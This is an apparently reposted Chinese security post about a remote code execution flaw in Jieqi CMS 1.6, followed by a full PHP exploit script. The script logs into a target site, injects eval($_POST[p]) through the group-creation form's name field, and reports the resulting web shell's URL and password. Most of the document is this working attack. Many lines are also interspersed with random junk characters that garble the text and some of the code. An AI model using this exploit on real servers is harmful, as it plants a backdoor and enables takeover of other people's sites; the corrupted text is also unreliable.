杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
0 I/ r( h3 [# x( D; v o8 ?( _3 K* w* S! t9 j- F$ h( ?% R% H/ {- `; }8 o
( u9 N9 p) G: c7 j
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
0 l4 [+ D; ?1 R. D* h! U 需要有一个能创建圈子的用户。$ x3 T: [9 C2 c: k
1 ? k' X3 R3 `9 Q, v" K<?php
$ \6 f6 c7 N7 s1 n7 L
: P1 Q0 x! x4 B6 w- T$ v' bprint_r('1 M+ p1 ^" f9 [4 g5 ^7 V$ `* D' }
+---------------------------------------------------------------------------+
* \/ n: S; O: K6 m7 W; f9 R% ^4 [Jieqi CMS V1.6 PHP Code Injection Exploit3 C9 {8 r% Z) ~" I5 M! w: X* m7 E
by flyh4t
5 m6 f5 s, ], Y+ Nmail: phpsec at hotmail dot com
- f0 \* ]5 Y% r5 }team: http://www.wolvez.org3 Q# m V! G; ~! _ n; n o# Q* k
+---------------------------------------------------------------------------+* O6 s& @. R: j
'); /**
4 w, s( x# @! G * works regardless of php.ini settings& h- H7 ?$ L: b4 R0 Q: B+ w3 y
*/ if ($argc < 5) { print_r('$ Y7 L- j( S( x& l) C* v
+---------------------------------------------------------------------------+
" T0 @" V2 @% q& }; b2 a9 CUsage: php '.$argv[0].' host path username' s* {0 r/ x) x
host: target server (ip/hostname)
7 d% V+ P% ?) ]& U) K# g9 I2 Vpath: path to jieqicms
7 }: x: o8 c3 y* z* E. @uasename: a username who can create group
4 r% ^% g2 O" k' f" g2 s4 rExample:
! u# x" L9 i+ T2 Z; h8 g. vphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password1 C, p- J7 M9 |/ a3 L# o
+---------------------------------------------------------------------------+
9 B! _4 B; Q5 h6 W! @'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
3 H1 s* [5 @' O# SContent-Disposition: form-data; name="gname"* i* {; |8 k* \3 g# |# o6 t5 v$ P
6 Y ^: h8 G4 _& C+ b'; $params .="';"; $params .='eval($_POST[p]);//flyh4t; I$ e- T) P4 j: u/ [
-----------------------------23281168279961
( \8 G: J8 y8 z8 i, Q) m2 k. GContent-Disposition: form-data; name="gcatid"
1 I, z; y. h, u8 N: z: B x1 u8 ~7 R
: Y- w. A8 L @4 l2 L% n' U1
O2 @) A2 `( z7 r: G s1 F8 e! A-----------------------------23281168279961
9 w3 t4 f/ v0 t( a. J) L R* H' ^3 yContent-Disposition: form-data; name="gaudit": @" X7 c" A3 {9 P4 v: U
, |9 x0 T) q6 k- \% C( `; p. U1* N1 { @" D7 s
-----------------------------23281168279961/ N; L1 r% f+ H F/ F8 ~3 I
Content-Disposition: form-data; name="gbrief"
; @+ g' o$ \1 ]/ k. P) q9 `: I 4 _+ k) }: I V- d; w
17 N9 f" O0 j* \' P2 e$ s
-----------------------------23281168279961--
G- X) u3 f c7 ^, x'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com/ b9 B/ n: S1 I& Z8 I5 S
% n* i# U6 d+ S" u) O, R- Qpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |